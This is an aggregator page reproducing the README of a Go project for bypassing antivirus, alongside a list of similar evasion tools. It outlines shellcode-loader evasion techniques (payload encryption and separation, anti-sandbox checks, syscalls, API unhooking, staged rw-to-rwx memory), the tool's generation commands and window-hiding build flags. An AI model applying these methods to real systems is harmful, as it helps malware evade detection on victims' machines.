GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → safe6Sec → GolangBypassAV

safe6Sec / GolangBypassAV

Licence: MIT license
研究利用golang各种姿势bypassAV

Programming Languages

go
31211 projects - #10 most used programming language

Labels

bypass-avbypass-antivirus

Projects that are alternatives of or similar to GolangBypassAV

trolo
trolo - an easy to use script for generating Payloads that bypasses antivirus
Stars: ✭ 45 (-91.51%)
Mutual labels:  bypass-av, bypass-antivirus
DNSWho
transmit cs beacon (shellcode) over self-made dns to avoid anti-kill and AV
Stars: ✭ 47 (-91.13%)
Mutual labels:  bypass-av, bypass-antivirus
Lscript
The LAZY script will make your life easier, and of course faster.
Stars: ✭ 3,056 (+476.6%)
Mutual labels:  bypass-av, bypass-antivirus
URL-obfuscator
Python Program to obfuscate URLs to make Phishing attacks more difficult to detect. Uses Active open redirect list and other URL obfuscation techniques.
Stars: ✭ 101 (-80.94%)
Mutual labels:  bypass-antivirus
ScareCrow-CobaltStrike
Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)
Stars: ✭ 387 (-26.98%)
Mutual labels:  bypass-antivirus
HellgateLoader CSharp
Load shellcode via HELLGATE, Rewrite hellgate with .net framework for learning purpose.
Stars: ✭ 73 (-86.23%)
Mutual labels:  bypass-antivirus
Defeat-Defender-V1.2
Powerful batch script to dismantle complete windows defender protection and even bypass tamper protection ..Disable Windows-Defender Permanently....Hack windows. POC
Stars: ✭ 885 (+66.98%)
Mutual labels:  bypass-antivirus
window-rat
The purpose of this tool is to test the window10 defender protection and also other antivirus protection.
Stars: ✭ 59 (-88.87%)
Mutual labels:  bypass-antivirus
Go Bypass
Golang Bypass Av Generator template
Stars: ✭ 606 (+14.34%)
Mutual labels:  bypass-antivirus
chameleon
PowerShell Script Obfuscator
Stars: ✭ 319 (-39.81%)
Mutual labels:  bypass-antivirus
Skrull
Skrull is a malware DRM, that prevents Automatic Sample Submission by AV/EDR and Signature Scanning from Kernel. It generates launchers that can run malware on the victim using the Process Ghosting technique. Also, launchers are totally anti-copy and naturally broken when got submitted.
Stars: ✭ 413 (-22.08%)
Mutual labels:  bypass-antivirus
DInvoke shellcodeload CSharp
ShellCodeLoader via DInvoke
Stars: ✭ 41 (-92.26%)
Mutual labels:  bypass-antivirus
NativePayload CBT
NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions Technique, without CreateThread Native API)
Stars: ✭ 109 (-79.43%)
Mutual labels:  bypass-antivirus
Thefatrat
Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…
Stars: ✭ 5,944 (+1021.51%)
Mutual labels:  bypass-av
secist script
No description or website provided.
Stars: ✭ 86 (-83.77%)
Mutual labels:  bypass-av
NewNtdllBypassInlineHook CSharp
Load a fresh new copy of ntdll.dll via file mapping to bypass API inline hook.
Stars: ✭ 35 (-93.4%)
Mutual labels:  bypass-antivirus
FuckAV
python写的一款免杀工具(shellcode加载器)BypassAV,国内杀软全过(windows denfend)2021-9-13
Stars: ✭ 254 (-52.08%)
Mutual labels:  bypass-antivirus
MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (-26.79%)
Mutual labels:  bypass-antivirus

GolangBypassAV

GolangBypassAV

研究利用golang来bypassAV

前言

免杀这块本来就不是web狗擅长的,而且作为一个web狗也没必要花太多时间来折腾这个,达到能用就行,不要追求全部免杀,能免杀目标就行。

说明

  • 如对本项目感兴趣,那么学习顺序如下:
    1. 先看test目录的东西,里面都是些简单的常见的东西
    2. 看完test目录后,可以看看bypass目录下的东西,里面是各种免杀姿势
    3. 如果只想使用的话,直接看gen目录就行。

免杀思路

静态

静态免杀比较简单,可选加密payload或者分离payload。
核心:
把特征去除即可过静态,某些杀毒软件带沙箱,还需要考虑反沙箱。
除此之外还可以考虑如下方式(由于要引入net包,导致文件大小比较大.我不做测试了.):

  • 把payload分离远程服务器
  • 把payload进行隐写
  • 把shellcode,放在自定义段里面 总之就是各种分离

动态

敏感api越少越好比如注册表操作、添加启动项、添加服务、添加用户、注入、劫持、创建进程、加载DLL等等
核心:

  • 想法设法的把shellcode加载到内存里面。
  • 使用系统调用+sysid
  • 敏感api脱钩,如地狱之门,二次加载
  • 敏感操作可以分步进行,如申请内存先申请读写(rw),再改成可以执行(rwx)。不要一来就直接申请读写执行的内存。

使用

暂时只支持windows系统编译!!!!

默认payload位置C:\Users\Administrator\Desktop\payload.bin
执行下面命令,即可生成免杀(game.exe)

指定payload
main.exe payload.bin

不指定payload,直接运行即可
main.exe

更新

2022.1.13 学习并添加光环之门免杀。真香

2021.8.29 完善生成命令,不用手动改特征。已经支持全部动态生成,只需要指定payload即可生成免杀。
源码在gen目录下面
默认生成的是带弹窗,想不带弹窗,自行修改源码。

2021.8.24
直接用gen里面代码进行生成,演示视频已经放公众号,目前免杀已达目的更新会放缓。
注意:建议每次使用之前手动改一下key,如果被杀改一下关键字即可。

编译命令

免杀效果最好,缺点文件最大
go build main.go

加了race参数,文件更大比原始的还大,效果很垃圾
go build -ldflags="-s -w" -o main1.exe -race main.go

常用编译命令,免杀效果较好,可以减少文件体积
go build -ldflags="-s -w" -o main1.exe

常用编译命令,免杀效果一般,减少文件体积+隐藏窗口
go build -ldflags="-s -w -H=windowsgui" -o main2.exe


set GOOS=windows GOARCH=amd64;go build -o main.exe

参考

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].